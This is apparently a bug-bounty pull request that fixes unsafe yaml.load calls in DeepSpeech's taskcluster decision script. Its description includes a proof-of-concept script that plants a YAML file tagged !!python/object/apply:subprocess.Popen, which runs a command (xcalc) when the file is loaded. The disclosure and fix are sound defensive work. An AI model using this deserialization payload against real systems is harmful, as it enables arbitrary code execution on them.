### PR TITLE
RCE-Fixed

### DIFF
--- a/taskcluster/tc-decision.py
+++ b/taskcluster/tc-decision.py
@@ -83,7 +83,7 @@ def load_specific_contextFile(file):
 
     try:
         with open(os.path.join(TASKS_ROOT, file)) as src:
-            specific_context = yaml.load(src)
+            specific_context = yaml.safe_load(src)
 
         if specific_context is None:
             specific_context = {}
@@ -104,7 +104,7 @@ def create_task_payload(build, base_context):
 
     build_context = defaultValues_build_context()
     with open(build) as src:
-        build_context['build'].update(yaml.load(src)['build'])
+        build_context['build'].update(yaml.safe_load(src)['build'])
 
     # Be able to use what has been defined in base_context
     # e.g., the {${event.head.branch}}
@@ -117,12 +117,12 @@ def create_task_payload(build, base_context):
     }
 
     with open(os.path.join(TASKS_ROOT, build_context['build']['template_file'])) as src:
-        template = yaml.load(src)
+        template = yaml.safe_load(src)
 
     contextes = merge_dicts({}, base_context, template_context, build_context)
     for one_context in glob(os.path.join(TASKS_ROOT, '*.cyml')):
         with open(one_context) as src:
-            contextes = merge_dicts(contextes, yaml.load(src))
+            contextes = merge_dicts(contextes, yaml.safe_load(src))
 
     return jsone.render(template, contextes)
 


### PR DESCRIPTION
### :bar_chart: Metadata *

Arbitrary Code Excecution in mozilla/DeepSpeech.DeepSpeech is an open source embedded (offline, on-device) speech-to-text engine which can run in real time on devices ranging from a Raspberry Pi 4 to high power GPU servers.

#### Bounty URL: https://www.huntr.dev/bounties/1-other-DeepSpeech

### :gear: Description *

This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load() in pyyaml

### :computer: Technical Description *

Fixed by avoiding unsafe loader.

### :bug: Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

```
import os

env = ['GITHUB_HEAD_BRANCH', 'GITHUB_HEAD_REPO_URL', 'GITHUB_HEAD_SHA', 'GITHUB_HEAD_USER', 'GITHUB_HEAD_USER_LOGIN', 'TASK_ID']

for x in env:
    if "USER" in x:
        env = "mozilla"
    elif "LOGIN" in x:
        env = "mozilla"
    elif "TASK_ID" in x:
        env = "137"
    else:
        env = ""
    os.environ[x] = env

#os.system("git clone https://github.com/mozilla/DeepSpeech.git")
os.chdir("DeepSpeech/taskcluster")
os.system("mkdir temp/")
os.system("mv *.yml *.cyml *.tyml temp/")

exploit_yaml = """build:
  metadata:
    name: "DeepSpeech Android ARM64 debug"
    description: "Building DeepSpeech for Android ARM64, debug version"

  template_file: extent_exploit.yml
"""

open("exploit.yml", "w+").write(exploit_yaml)

# data = b"""!!python/object/apply:subprocess.Popen
# - ls"""
extent_yaml = """!!python/object/apply:subprocess.Popen
- ['xcalc']
"""

# extent_yaml = """!!python/object/apply:time.sleep [10]"""

open("extent_exploit.yml", "w+").write(extent_yaml)

# os.system("python -m pip install json-e")
# os.system("python -m pip install slugid")
# os.system("python -m pip install networkx")

os.system("python tc-decision.py --dry")
```

Execute the following commands in another terminal:

```
python3 exploit.py
```

    Check the Output:

xcalc will pop up.

### :fire: Proof of Fix (PoF) *

After fix it will not popup a calc

### :+1: User Acceptance Testing (UAT)

After fix functionality is unaffected.
